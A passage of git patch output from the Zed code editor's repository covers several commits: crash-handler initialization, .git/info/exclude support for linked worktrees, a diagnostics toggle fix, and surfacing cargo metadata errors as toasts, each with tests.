option_env!("ZED_COMMIT_SHA").unwrap_or("no_sha").to_owned(), + }, + |task| { + smol::spawn(task).detach(); + }, + |pid| paths::temp_dir().join(format!("zed-remote-server-proxy-crash-handler-{pid}")), + // we are running outside gpui + #[allow(clippy::disallowed_methods)] + |duration| FutureExt::map(Timer::after(duration), |_| ()), + )) + .detach(); + }; log::info!("starting proxy process. PID: {}", std::process::id()); let server_pid = { let server_pid = check_pid_file(&server_paths.pid_file).map_err(|source| { diff --git a/crates/system_specs/Cargo.toml b/crates/system_specs/Cargo.toml index 15d6822b387024..7af62d934affff 100644 --- a/crates/system_specs/Cargo.toml +++ b/crates/system_specs/Cargo.toml @@ -16,7 +16,6 @@ default = [] [dependencies] anyhow.workspace = true -client.workspace = true gpui.workspace = true human_bytes.workspace = true release_channel.workspace = true diff --git a/crates/system_specs/src/system_specs.rs b/crates/system_specs/src/system_specs.rs index 139f23d19373cf..2c7a169ef01923 100644 --- a/crates/system_specs/src/system_specs.rs +++ b/crates/system_specs/src/system_specs.rs @@ -1,4 +1,3 @@ -use client::telemetry; pub use gpui::GpuSpecs; use gpui::{App, AppContext as _, Task, Window, actions}; use human_bytes::human_bytes; @@ -30,10 +29,14 @@ pub struct SystemSpecs { } impl SystemSpecs { - pub fn new(window: &mut Window, cx: &mut App) -> Task { + pub fn new( + window: &mut Window, + cx: &mut App, + os_name: String, + os_version: String, + ) -> Task { let app_version = AppVersion::global(cx).to_string(); let release_channel = ReleaseChannel::global(cx); - let os_name = telemetry::os_name(); let system = System::new_with_specifics( RefreshKind::nothing().with_memory(MemoryRefreshKind::everything()), ); @@ -55,7 +58,6 @@ impl SystemSpecs { }); cx.background_spawn(async move { - let os_version = telemetry::os_version(); SystemSpecs { app_version, release_channel: release_channel.display_name(), @@ -74,9 +76,9 @@ impl SystemSpecs { app_version: Version, app_commit_sha: Option, release_channel: ReleaseChannel, + os_name: String, + os_version: String, ) -> Self { - let os_name = telemetry::os_name(); - let os_version = telemetry::os_version(); let system = System::new_with_specifics( RefreshKind::nothing().with_memory(MemoryRefreshKind::everything()), ); diff --git a/crates/zed/src/main.rs b/crates/zed/src/main.rs index 9141fe1aa8ae31..f8023224a3365a 100644 --- a/crates/zed/src/main.rs +++ b/crates/zed/src/main.rs @@ -23,6 +23,7 @@ use git::GitHostingProviderRegistry; use git_ui::clone::clone_and_open; use gpui::{ App, AppContext, Application, AsyncApp, Focusable as _, QuitMode, Task, UpdateGlobal as _, + block_on, }; use gpui_platform; @@ -43,6 +44,7 @@ use recent_projects::{RemoteSettings, open_remote_project}; use release_channel::{AppCommitSha, AppVersion, ReleaseChannel}; use session::{AppSession, Session}; use settings::{BaseKeymap, Settings, SettingsStore, watch_config_file}; +use smol::future::poll_once; use std::{ cell::RefCell, env, @@ -67,7 +69,7 @@ use zed::{ handle_keymap_file_changes, initialize_workspace, open_paths_with_positions, }; -use crate::zed::{OpenRequestKind, eager_load_active_theme_and_icon_theme}; +use crate::zed::{CrashHandler, OpenRequestKind, eager_load_active_theme_and_icon_theme}; #[cfg(feature = "mimalloc")] #[global_allocator] @@ -195,7 +197,7 @@ fn main() { // `zed --crash-handler` Makes zed operate in minidump crash handler mode if let Some(socket) = &args.crash_handler { - crashes::crash_server(socket.as_path()); + crashes::crash_server(socket.as_path(), paths::logs_dir().clone()); return; } @@ -299,6 +301,8 @@ fn main() { app_version, app_commit_sha, *release_channel::RELEASE_CHANNEL, + client::telemetry::os_name(), + client::telemetry::os_version(), ); println!("Zed System Specs (from CLI):\n{}", system_specs); return; @@ -338,28 +342,6 @@ fn main() { KeyValueStore::from_app_db(&app_db), )); let background_executor = app.background_executor(); - crashes::init( - InitCrashHandler { - session_id, - // strip the build and channel information from the version string, we send them separately - zed_version: semver::Version::new( - app_version.major, - app_version.minor, - app_version.patch, - ) - .to_string(), - binary: "zed".to_string(), - release_channel: release_channel::RELEASE_CHANNEL_NAME.clone(), - commit_sha: app_commit_sha - .as_ref() - .map(|sha| sha.full()) - .unwrap_or_else(|| "no sha".to_owned()), - }, - |task| { - app.background_executor().spawn(task).detach(); - }, - move |duration| background_executor.timer(duration), - ); let (open_listener, mut open_rx) = OpenListener::new(); @@ -389,6 +371,46 @@ fn main() { return; } + let should_install_crash_handler = matches!( + env::var("ZED_GENERATE_MINIDUMPS").as_deref(), + Ok("true" | "1") + ) || *release_channel::RELEASE_CHANNEL + != ReleaseChannel::Dev; + + let crash_handler = if should_install_crash_handler { + Some( + app.background_executor().spawn(crashes::init( + InitCrashHandler { + session_id, + // strip the build and channel information from the version string, we send them separately + zed_version: semver::Version::new( + app_version.major, + app_version.minor, + app_version.patch, + ) + .to_string(), + binary: "zed".to_string(), + release_channel: release_channel::RELEASE_CHANNEL_NAME.clone(), + commit_sha: app_commit_sha + .as_ref() + .map(|sha| sha.full()) + .unwrap_or_else(|| "no sha".to_owned()), + }, + { + let background_executor1 = app.background_executor(); + move |task| { + background_executor1.spawn(task).detach(); + } + }, + |pid| paths::temp_dir().join(format!("zed-crash-handler-{pid}")), + move |duration| background_executor.timer(duration), + )), + ) + } else { + crashes::force_backtrace(); + None + }; + let git_hosting_provider_registry = Arc::new(GitHostingProviderRegistry::new()); let git_binary_path = if cfg!(target_os = "macos") && option_env!("ZED_BUNDLE").as_deref() == Some("true") { @@ -417,7 +439,7 @@ fn main() { util::load_login_shell_environment().await.log_err(); shell_env_loaded_tx.send(()).ok(); }) - .detach() + .detach(); } else { drop(shell_env_loaded_tx) } @@ -573,12 +595,17 @@ fn main() { ); cx.subscribe(&user_store, { let telemetry = telemetry.clone(); - move |_, evt: &client::user::Event, _| match evt { + move |_, evt: &client::user::Event, cx| match evt { client::user::Event::PrivateUserInfoUpdated => { - crashes::set_user_info(crashes::UserInfo { - metrics_id: telemetry.metrics_id().map(|s| s.to_string()), - is_staff: telemetry.is_staff(), - }); + if let Some(crash_client) = cx.try_global::() { + crashes::set_user_info( + &crash_client.0, + crashes::UserInfo { + metrics_id: telemetry.metrics_id().map(|s| s.to_string()), + is_staff: telemetry.is_staff(), + }, + ); + } } _ => {} } @@ -810,6 +837,25 @@ fn main() { let menus = app_menus(cx); cx.set_menus(menus); + + if let Some(mut crash_handler) = crash_handler { + let crash_handler2 = block_on(poll_once(&mut crash_handler)); + match crash_handler2 { + Some(crash_handler) => { + cx.set_global(CrashHandler(crash_handler)); + } + None => { + cx.spawn(async move |cx| { + let client1 = crash_handler.await; + cx.update(|cx| { + cx.set_global(CrashHandler(client1)); + }); + }) + .detach(); + } + } + } + initialize_workspace(app_state.clone(), cx); cx.activate(true); diff --git a/crates/zed/src/zed.rs b/crates/zed/src/zed.rs index 6d1a9c176f1193..9461c89b7ad680 100644 --- a/crates/zed/src/zed.rs +++ b/crates/zed/src/zed.rs @@ -100,6 +100,10 @@ use zed_actions::{ OpenZedUrl, Quit, }; +pub struct CrashHandler(pub Arc); + +impl gpui::Global for CrashHandler {} + actions!( zed, [ @@ -515,7 +519,9 @@ pub fn initialize_workspace(app_state: Arc, cx: &mut App) { if let Some(specs) = window.gpu_specs() { log::info!("Using GPU: {:?}", specs); show_software_emulation_warning_if_needed(specs.clone(), window, cx); - crashes::set_gpu_info(specs); + if let Some(crash_client) = cx.try_global::() { + crashes::set_gpu_info(&crash_client.0, specs); + } } let edit_prediction_menu_handle = PopoverMenuHandle::default(); From 4c757218b90edf581a4a909d0d851424ff81f545 Mon Sep 17 00:00:00 2001 From: Fanteria Date: Mon, 4 May 2026 08:33:52 +0200 Subject: [PATCH 145/231] Respect .git/info/exclude in secondary worktrees (#51536) Closes #50880 When a git worktree linked via a `.git` file (e.g. `gitdir: /repo/.git/worktrees/my-worktree`) was opened in Zed, entries in `.git/info/exclude` were not respected. This is now fixed. Before you mark this PR as ready for review, make sure that you have: - [x] Added a solid test coverage and/or screenshots from doing manual testing - [x] Done a self-review taking into account security and performance aspects - [x] Aligned any UI changes with the [UI checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) Release Notes: - Fixed `.git/info/exclude` not being respected when opening a secondary git worktree https://github.com/user-attachments/assets/f38df5dc-96eb-40a8-a77c-0932a2c8575b --------- Co-authored-by: Lukas Wirth Co-authored-by: Lukas Wirth --- crates/worktree/src/worktree.rs | 4 +- crates/worktree/tests/integration/main.rs | 70 +++++++++++++++++++++++ 2 files changed, 73 insertions(+), 1 deletion(-) diff --git a/crates/worktree/src/worktree.rs b/crates/worktree/src/worktree.rs index c34f358bc84562..dc1f208fac7067 100644 --- a/crates/worktree/src/worktree.rs +++ b/crates/worktree/src/worktree.rs @@ -5568,7 +5568,9 @@ async fn discover_ancestor_git_repo( }; } - let repo_exclude_abs_path = ancestor_dot_git.join(REPO_EXCLUDE); + let dot_git_path: Arc = ancestor_dot_git.into(); + let (_, common_dir_abs_path) = discover_git_paths(&dot_git_path, fs.as_ref()).await; + let repo_exclude_abs_path = common_dir_abs_path.join(REPO_EXCLUDE); if let Ok(repo_exclude) = build_gitignore(&repo_exclude_abs_path, fs.as_ref()).await { exclude = Some(Arc::new(repo_exclude)); } diff --git a/crates/worktree/tests/integration/main.rs b/crates/worktree/tests/integration/main.rs index 2fedafc591f04f..7ea63f878cc7ca 100644 --- a/crates/worktree/tests/integration/main.rs +++ b/crates/worktree/tests/integration/main.rs @@ -2844,6 +2844,76 @@ async fn test_global_gitignore(executor: BackgroundExecutor, cx: &mut TestAppCon }); } +#[gpui::test] +async fn test_repo_exclude_in_worktree(executor: BackgroundExecutor, cx: &mut TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(executor); + + fs.insert_tree( + path!("/repo"), + json!({ + ".git": { + "info": { + "exclude": ".env.*" + }, + "worktrees": { + "my-worktree": { + "commondir": "../.." + } + } + } + }), + ) + .await; + + fs.insert_tree( + path!("/worktree"), + json!({ + // .git is pointing to the repo + ".git": "gitdir: /repo/.git/worktrees/my-worktree", + ".env.local": "secret=1234", + "not-ignored.txt": "", + }), + ) + .await; + + let worktree = Worktree::local( + path!("/worktree").as_ref(), + true, + fs.clone(), + Default::default(), + true, + WorktreeId::from_proto(0), + &mut cx.to_async(), + ) + .await + .unwrap(); + + worktree + .update(cx, |worktree, _| { + worktree.as_local().unwrap().scan_complete() + }) + .await; + cx.run_until_parked(); + + // .env.local should be ignored via info/exclude from the repo's exclude + worktree.update(cx, |worktree, _cx| { + let expected_excluded_paths = []; + let expected_ignored_paths = [".env.local"]; + let expected_tracked_paths = ["not-ignored.txt"]; + let expected_included_paths = []; + + check_worktree_entries( + worktree, + &expected_excluded_paths, + &expected_ignored_paths, + &expected_tracked_paths, + &expected_included_paths, + ); + }); +} + #[gpui::test] async fn test_repo_exclude(executor: BackgroundExecutor, cx: &mut TestAppContext) { init_test(cx); From 4fdc7025ec8111540ab914dddcb5f23d9dd762e9 Mon Sep 17 00:00:00 2001 From: Om Chillure Date: Mon, 4 May 2026 12:07:50 +0530 Subject: [PATCH 146/231] Fix diagnostics in editor control enabling by itself (#52907) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit ### Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [ ] Unsafe blocks (if any) have justifying comments ← N/A, no unsafe blocks - [x] The content is consistent with the UI/UX checklist - [ ] Tests cover the new/changed behavior ← no existing tests; none added - [x] Performance impact has been considered and is acceptable #### Closes #52881 ### Fix Add a `diagnostics_manually_toggled: bool` field to `Editor`. It is set to `true` when the user toggles diagnostics off, and back to `false` when they toggle them on again. `settings_changed` now skips the severity override while this flag is set, preserving the user's intent across settings reloads. Video [Screencast from 2026-04-01 20-42-16.webm](https://github.com/user-attachments/assets/0e52868c-85bb-4270-b487-30bf50da97c2) Release Notes: - Fixed "Diagnostics" in Editor Controls re-enabling itself after being manually disabled --- crates/editor/src/editor.rs | 10 +++---- crates/editor/src/editor_tests.rs | 41 ++++++++++++++++++++++++++ crates/zed/src/zed/quick_action_bar.rs | 3 +- 3 files changed, 48 insertions(+), 6 deletions(-) diff --git a/crates/editor/src/editor.rs b/crates/editor/src/editor.rs index c625a3b97af1a3..dca22e31bffac8 100644 --- a/crates/editor/src/editor.rs +++ b/crates/editor/src/editor.rs @@ -20580,11 +20580,11 @@ impl Editor { window: &mut Window, cx: &mut Context, ) { - if !self.diagnostics_enabled() { - return; - } + let diagnostics_enabled = + self.diagnostics_enabled() && self.diagnostics_max_severity != DiagnosticSeverity::Off; + self.diagnostics_enabled = !diagnostics_enabled; - let new_severity = if self.diagnostics_max_severity == DiagnosticSeverity::Off { + let new_severity = if self.diagnostics_enabled { EditorSettings::get_global(cx) .diagnostics_max_severity .filter(|severity| severity != &DiagnosticSeverity::Off) @@ -20593,7 +20593,7 @@ impl Editor { DiagnosticSeverity::Off }; self.set_max_diagnostics_severity(new_severity, cx); - if self.diagnostics_max_severity == DiagnosticSeverity::Off { + if self.diagnostics_enabled { self.active_diagnostics = ActiveDiagnostic::None; self.inline_diagnostics_update = Task::ready(()); self.inline_diagnostics.clear(); diff --git a/crates/editor/src/editor_tests.rs b/crates/editor/src/editor_tests.rs index b0ea1b86740939..7f6ddf9dfa94a3 100644 --- a/crates/editor/src/editor_tests.rs +++ b/crates/editor/src/editor_tests.rs @@ -37367,3 +37367,44 @@ fn setup_syntax_highlighting_with_theme( ); }); } + +#[gpui::test] +async fn test_toggle_diagnostics_persists_across_settings_change(cx: &mut TestAppContext) { + init_test(cx, |_| {}); + let mut cx = EditorTestContext::new(cx).await; + + cx.update_editor(|editor, _, _| { + assert!( + editor.diagnostics_enabled(), + "diagnostics should start enabled by default" + ); + }); + + cx.update_editor(|editor, window, cx| { + editor.toggle_diagnostics(&actions::ToggleDiagnostics, window, cx); + assert!( + !editor.diagnostics_enabled(), + "diagnostics should be disabled after toggle" + ); + }); + + update_test_editor_settings(&mut cx, &|settings| { + settings.cursor_blink = Some(false); + }); + cx.run_until_parked(); + + cx.update_editor(|editor, _, _| { + assert!( + !editor.diagnostics_enabled(), + "diagnostics should remain disabled after settings change" + ); + }); + + cx.update_editor(|editor, window, cx| { + editor.toggle_diagnostics(&actions::ToggleDiagnostics, window, cx); + assert!( + editor.diagnostics_enabled(), + "diagnostics should be re-enabled after second toggle" + ); + }); +} diff --git a/crates/zed/src/zed/quick_action_bar.rs b/crates/zed/src/zed/quick_action_bar.rs index 0f6864e6fa33af..d1ffb58b79244c 100644 --- a/crates/zed/src/zed/quick_action_bar.rs +++ b/crates/zed/src/zed/quick_action_bar.rs @@ -120,7 +120,8 @@ impl Render for QuickActionBar { let semantic_highlights_enabled = editor_value.semantic_highlights_enabled(); let code_lens_enabled = editor_value.code_lens_enabled(); let is_full = editor_value.mode().is_full(); - let diagnostics_enabled = editor_value.diagnostics_max_severity != DiagnosticSeverity::Off; + let diagnostics_enabled = editor_value.diagnostics_enabled() + && editor_value.diagnostics_max_severity != DiagnosticSeverity::Off; let supports_inline_diagnostics = editor_value.inline_diagnostics_enabled(); let inline_diagnostics_enabled = editor_value.show_inline_diagnostics(); let git_blame_inline_enabled = editor_value.git_blame_inline_enabled(); From b3b84cc8bf0ee7ae3508fc3fa7f889e26d55d899 Mon Sep 17 00:00:00 2001 From: Tomas Esteves <140959270+tomaseesteves@users.noreply.github.com> Date: Mon, 4 May 2026 07:50:38 +0100 Subject: [PATCH 147/231] Fix "Run Debugger" failing silently when project does not compile (#52439) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit ## Context Previously the Run Debugger gutter arrow would fail silently when the Cargo.toml had garbage lines such as “asdfasdf”. This fix makes it so that the error is detected and bubbles up to the editor, which will notify the user with a toast diagnostic. Closes #46716 ## Fix https://github.com/user-attachments/assets/2e9ac7e9-1306-4607-a762-457131473572 ## How to Review Small PR - focused on four different files: In - `crates/languages/src/rust.rs`: - `target_info_from_abs_path()` - The function signature was changed from `Option<(Option, Arc)>` to `Result, Arc)>>`. A condition was added to ensure that if the Cargo metadata command is unsuccessful, the function returns an error instead of causing an EOF error while deserializing the stdout of the command. - `build_context()` - Added a `?` in `target_info_from_abs_path(path, project_env.as_ref()).await` in order to return the error. In - `crates/project/src/task_store.rs`: - `local_task_context_for_location()` and `remote_task_context_for_location()` - The functions signatures were changed from `Task>` to `Task>>` for the purpose of propagating the error. In - `crates/editor/src/editor_tests.rs`: - `build_tasks_context()` - The function signature was changed from `Task>` to `Task>>` . - `toggle_code_actions()` - In case `build_tasks_context()` fails, the functions notifies the error to the user as a Toast notification. In - `crates/editor/src/runnables.rs`: - Since `build_tasks_context()` and `task_store.task_context_for_location()` now return a Result, the callers` spawn_nearest_task() `and `task_context()` were modified. The resulting Result types are transformed to match the expected return types of `TaskContext` and `Task>` Two new tests were added. The first, `target_info_from_abs_path_failed` in `crates/languages/src/rust.rs`, checks if the system properly catches the error. The second, `test_toggle_code_actions_build_tasks_context_error_notifies` in `crates/editor/src/editor_tests.rs`, confirms that the editor triggers the expected error notification. ## Self-Review Checklist - [X] I've reviewed my own diff for quality, security, and reliability - [ ] Unsafe blocks (if any) have justifying comments - [X] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [X] Tests cover the new/changed behavior - [X] Performance impact has been considered and is acceptable Release Notes: - Fixed the error: Run Debugger failing silently due to invalid Cargo.toml content --------- Co-authored-by: Lukas Wirth --- Cargo.lock | 1 + crates/editor/src/editor.rs | 15 +++-- crates/editor/src/editor_tests.rs | 101 +++++++++++++++++++++++++++++- crates/editor/src/runnables.rs | 7 ++- crates/languages/Cargo.toml | 1 + crates/languages/src/rust.rs | 38 ++++++++--- crates/project/src/task_store.rs | 27 ++++---- 7 files changed, 158 insertions(+), 32 deletions(-) diff --git a/Cargo.lock b/Cargo.lock index 5242481f927a68..383f5e2b9906e2 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -9791,6 +9791,7 @@ dependencies = [ "smol", "snippet", "task", + "tempfile", "terminal", "theme", "tree-sitter", diff --git a/crates/editor/src/editor.rs b/crates/editor/src/editor.rs index dca22e31bffac8..c1741cd6215807 100644 --- a/crates/editor/src/editor.rs +++ b/crates/editor/src/editor.rs @@ -225,7 +225,7 @@ use workspace::{ OpenTerminal, Pane, RestoreOnStartupBehavior, SERIALIZATION_THROTTLE_TIME, SplitDirection, TabBarSettings, Toast, ViewId, Workspace, WorkspaceId, WorkspaceSettings, item::{ItemBufferKind, ItemHandle, PreviewTabsSettings, SaveOptions}, - notifications::{DetachAndPromptErr, NotificationId, NotifyTaskExt}, + notifications::{DetachAndPromptErr, NotificationId, NotifyResultExt, NotifyTaskExt}, searchable::SearchEvent, }; pub use zed_actions::editor::RevealInFileManager; @@ -7055,7 +7055,8 @@ impl Editor { let runnable_task = match deployed_from { Some(CodeActionSource::Indicator(_)) => Task::ready(Ok(Default::default())), _ => { - let mut task_context_task = Task::ready(None); + let mut task_context_task = Task::ready(Ok(None)); + let workspace = self.workspace().map(|w| w.downgrade()); if let Some(tasks) = &tasks && let Some(project) = project { @@ -7066,7 +7067,13 @@ impl Editor { cx.spawn_in(window, { let buffer = buffer.clone(); async move |editor, cx| { - let task_context = task_context_task.await; + let task_context = match workspace { + Some(ws) => task_context_task + .await + .notify_workspace_async_err(ws, cx) + .flatten(), + None => task_context_task.await.ok().flatten(), + }; let resolved_tasks = tasks @@ -9744,7 +9751,7 @@ impl Editor { buffer_row: u32, tasks: &Arc, cx: &mut Context, - ) -> Task> { + ) -> Task>> { let position = Point::new(buffer_row, tasks.column); let range_start = buffer.read(cx).anchor_at(position, Bias::Right); let location = Location { diff --git a/crates/editor/src/editor_tests.rs b/crates/editor/src/editor_tests.rs index 7f6ddf9dfa94a3..05fb9425c6a0b0 100644 --- a/crates/editor/src/editor_tests.rs +++ b/crates/editor/src/editor_tests.rs @@ -18,15 +18,16 @@ use buffer_diff::{BufferDiff, DiffHunkSecondaryStatus, DiffHunkStatus, DiffHunkS use collections::HashMap; use futures::{StreamExt, channel::oneshot}; use gpui::{ - BackgroundExecutor, DismissEvent, TestAppContext, UpdateGlobal, VisualTestContext, + BackgroundExecutor, DismissEvent, Task, TestAppContext, UpdateGlobal, VisualTestContext, WindowBounds, WindowOptions, div, }; use indoc::indoc; use language::{ BracketPair, BracketPairConfig, Capability::ReadWrite, - DiagnosticSourceKind, FakeLspAdapter, IndentGuideSettings, LanguageConfig, - LanguageConfigOverride, LanguageMatcher, LanguageName, LanguageQueries, Override, Point, + ContextLocation, ContextProvider, DiagnosticSourceKind, FakeLspAdapter, IndentGuideSettings, + LanguageConfig, LanguageConfigOverride, LanguageMatcher, LanguageName, LanguageQueries, + LanguageToolchainStore, Override, Point, language_settings::{ CompletionSettingsContent, FormatterList, LanguageSettingsContent, LspInsertMode, }, @@ -59,6 +60,7 @@ use std::{ iter, sync::atomic::{self, AtomicUsize}, }; +use task::TaskVariables; use test::build_editor_with_project; use unindent::Unindent; use util::{ @@ -26844,6 +26846,99 @@ async fn test_find_enclosing_node_with_task(cx: &mut TestAppContext) { }); } +#[gpui::test] +async fn test_toggle_code_actions_build_tasks_context_error_notifies(cx: &mut TestAppContext) { + init_test(cx, |_| {}); + + struct FailingContextProvider; + impl ContextProvider for FailingContextProvider { + fn build_context( + &self, + _: &TaskVariables, + _: ContextLocation<'_>, + _: Option>, + _: Arc, + _: &mut gpui::App, + ) -> Task> { + Task::ready(Err(anyhow::anyhow!("Task context provider failed"))) + } + } + + let language = Arc::new( + Arc::try_unwrap(rust_lang()) + .unwrap() + .with_context_provider(Some(Arc::new(FailingContextProvider))), + ); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree(path!("/a"), json!({ "main.rs": "fn main() {}" })) + .await; + + let project = Project::test(fs, [path!("/a").as_ref()], cx).await; + let language_registry = project.read_with(cx, |project, _| project.languages().clone()); + language_registry.add(language.clone()); + + let window = cx.add_window(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let mut cx = VisualTestContext::from_window(*window, cx); + let workspace = window + .read_with(&mut cx, |mw, _| mw.workspace().clone()) + .unwrap(); + + let worktree_id = workspace.update_in(&mut cx, |workspace, _, cx| { + workspace.project().update(cx, |project, cx| { + project.worktrees(cx).next().unwrap().read(cx).id() + }) + }); + + let editor = workspace + .update_in(&mut cx, |workspace, window, cx| { + workspace.open_path((worktree_id, rel_path("main.rs")), None, true, window, cx) + }) + .await + .unwrap() + .downcast::() + .unwrap(); + + editor.update_in(&mut cx, |editor, window, cx| { + let buffer = editor.buffer().read(cx).as_singleton().unwrap(); + buffer.update(cx, |buffer, cx| { + buffer.set_language(Some(language.clone()), cx) + }); + + let snapshot = editor.buffer().read(cx).snapshot(cx); + editor.runnables.insert( + buffer.read(cx).remote_id(), + 0, + buffer.read(cx).version(), + RunnableTasks { + templates: Vec::new(), + offset: snapshot.anchor_before(MultiBufferOffset(0)), + column: 0, + extra_variables: HashMap::default(), + context_range: BufferOffset(0)..BufferOffset(0), + }, + ); + editor.change_selections(SelectionEffects::no_scroll(), window, cx, |s| { + s.select_ranges([Point::new(0, 0)..Point::new(0, 0)]) + }); + + editor.toggle_code_actions( + &ToggleCodeActions { + deployed_from: None, + quick_launch: false, + }, + window, + cx, + ); + }); + + cx.run_until_parked(); + + workspace.update_in(&mut cx, |workspace, _, _| { + assert!(!workspace.notification_ids().is_empty()); + }); +} + #[gpui::test] async fn test_folding_buffers(cx: &mut TestAppContext) { init_test(cx, |_| {}); diff --git a/crates/editor/src/runnables.rs b/crates/editor/src/runnables.rs index 7b0b4d572a5137..956e4dd2e09484 100644 --- a/crates/editor/src/runnables.rs +++ b/crates/editor/src/runnables.rs @@ -310,7 +310,7 @@ impl Editor { let reveal_strategy = action.reveal; let task_context = Self::build_tasks_context(&project, &buffer, buffer_row, &tasks, cx); cx.spawn_in(window, async move |_, cx| { - let context = task_context.await?; + let context = task_context.await.ok().flatten()?; let (task_source_kind, mut resolved_task) = tasks.resolve(&context).next()?; let resolved = &mut resolved_task.resolved; @@ -405,11 +405,12 @@ impl Editor { variables }; - project.update(cx, |project, cx| { + let task = project.update(cx, |project, cx| { project.task_store().update(cx, |task_store, cx| { task_store.task_context_for_location(captured_variables, location, cx) }) - }) + }); + cx.background_spawn(async move { task.await.ok().flatten() }) } pub fn lsp_task_sources( diff --git a/crates/languages/Cargo.toml b/crates/languages/Cargo.toml index 4188c97a097a83..8db195ba7de274 100644 --- a/crates/languages/Cargo.toml +++ b/crates/languages/Cargo.toml @@ -67,6 +67,7 @@ util.workspace = true [dev-dependencies] fs = { workspace = true, features = ["test-support"] } pretty_assertions.workspace = true +tempfile = { workspace = true} settings = { workspace = true, features = ["test-support"] } theme = { workspace = true, features = ["test-support"] } tree-sitter-bash.workspace = true diff --git a/crates/languages/src/rust.rs b/crates/languages/src/rust.rs index 56d1f30f3c4692..57d86ea91f342a 100644 --- a/crates/languages/src/rust.rs +++ b/crates/languages/src/rust.rs @@ -898,7 +898,7 @@ impl ContextProvider for RustContextProvider { } if let Some(path) = local_abs_path.as_ref() && let Some((target, manifest_path)) = - target_info_from_abs_path(path, project_env.as_ref()).await + target_info_from_abs_path(path, project_env.as_ref()).await? { if let Some(target) = target { variables.extend(TaskVariables::from_iter([ @@ -1164,24 +1164,31 @@ struct TargetInfo { async fn target_info_from_abs_path( abs_path: &Path, project_env: Option<&HashMap>, -) -> Option<(Option, Arc)> { +) -> Result, Arc)>> { let mut command = util::command::new_command("cargo"); if let Some(envs) = project_env { command.envs(envs); } let output = command - .current_dir(abs_path.parent()?) + .current_dir( + abs_path + .parent() + .ok_or_else(|| anyhow::anyhow!("failed to get parent directory"))?, + ) .arg("metadata") .arg("--no-deps") .arg("--format-version") .arg("1") .output() - .await - .log_err()? - .stdout; + .await?; + + if !output.status.success() { + let stderr_msg = String::from_utf8_lossy(&output.stderr); + anyhow::bail!("Cargo metadata failed\n {stderr_msg}"); + } - let metadata: CargoMetadata = serde_json::from_slice(&output).log_err()?; - target_info_from_metadata(metadata, abs_path) + let metadata: CargoMetadata = serde_json::from_slice(&output.stdout)?; + Ok(target_info_from_metadata(metadata, abs_path)) } fn target_info_from_metadata( @@ -2092,6 +2099,21 @@ mod tests { } } + #[test] + fn target_info_from_abs_path_failed() { + let project_root = tempfile::tempdir().unwrap(); + let cargo_toml_path = project_root.path().join("Cargo.toml"); + let src_dir = project_root.path().join("src"); + let main_rs_path = src_dir.join("main.rs"); + + std::fs::create_dir_all(&src_dir).unwrap(); + std::fs::write(&cargo_toml_path, "invalid_toml = {[[{").unwrap(); + std::fs::write(&main_rs_path, "// rust").unwrap(); + + let e = smol::block_on(target_info_from_abs_path(&main_rs_path, None)).unwrap_err(); + assert!(e.to_string().contains("Cargo metadata failed")); + } + #[test] fn test_rust_test_fragment() { #[track_caller] diff --git a/crates/project/src/task_store.rs b/crates/project/src/task_store.rs index 34beb9a8e17275..df5e6bdd0f78d3 100644 --- a/crates/project/src/task_store.rs +++ b/crates/project/src/task_store.rs @@ -145,7 +145,7 @@ impl TaskStore { }; store.task_context_for_location(captured_variables, location, cx) }); - let task_context = context_task.await.unwrap_or_default(); + let task_context = context_task.await?.unwrap_or_default(); Ok(proto::TaskContext { project_env: task_context.project_env.into_iter().collect(), cwd: task_context @@ -207,7 +207,7 @@ impl TaskStore { captured_variables: TaskVariables, location: Location, cx: &mut App, - ) -> Task> { + ) -> Task>> { match self { TaskStore::Functional(state) => match &state.mode { StoreMode::Local { environment, .. } => local_task_context_for_location( @@ -233,7 +233,7 @@ impl TaskStore { cx, ), }, - TaskStore::Noop => Task::ready(None), + TaskStore::Noop => Task::ready(Ok(None)), } } @@ -315,7 +315,7 @@ fn local_task_context_for_location( captured_variables: TaskVariables, location: Location, cx: &App, -) -> Task> { +) -> Task>> { let worktree_id = location.buffer.read(cx).file().map(|f| f.worktree_id(cx)); let worktree_abs_path = worktree_id .and_then(|worktree_id| worktree_store.read(cx).worktree_for_id(worktree_id, cx)) @@ -342,16 +342,16 @@ fn local_task_context_for_location( cx, ) }) - .await - .log_err()?; + .await?; + // Remove all custom entries starting with _, as they're not intended for use by the end user. task_variables.sweep(); - Some(TaskContext { + Ok(Some(TaskContext { project_env: project_env.unwrap_or_default(), cwd: worktree_abs_path.map(|p| p.to_path_buf()), task_variables, - }) + })) }) } @@ -364,7 +364,7 @@ fn remote_task_context_for_location( location: Location, toolchain_store: Arc, cx: &mut App, -) -> Task> { +) -> Task>> { cx.spawn(async move |cx| { // We need to gather a client context, as the headless one may lack certain information (e.g. tree-sitter parsing is disabled there, so symbols are not available). let mut remote_context = cx @@ -401,8 +401,8 @@ fn remote_task_context_for_location( .map(|(k, v)| (k.to_string(), v)) .collect(), }); - let task_context = context_task.await.log_err()?; - Some(TaskContext { + let task_context = context_task.await?; + Ok(Some(TaskContext { cwd: task_context.cwd.map(PathBuf::from), task_variables: task_context .task_variables @@ -418,7 +418,7 @@ fn remote_task_context_for_location( ) .collect(), project_env: task_context.project_env.into_iter().collect(), - }) + })) }) } @@ -496,8 +496,7 @@ fn combine_task_variables( cx, ) }) - .await - .context("building provider context")?, + .await?, ); } Ok(captured_variables) From bcf97db1a5bfe5dd5156bb91574f1de450a818b3 Mon Sep 17 00:00:00 2001 From: Bennet Bo Fenner Date: Mon, 4 May 2026 09:52:37 +0200 Subject: [PATCH 148/231] cloud: Fix incorrect model getting selected at startup (#55325) Follow up to #54826, after which the fallback model would be selected instead of the cloud model when starting Zed Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Release Notes: - 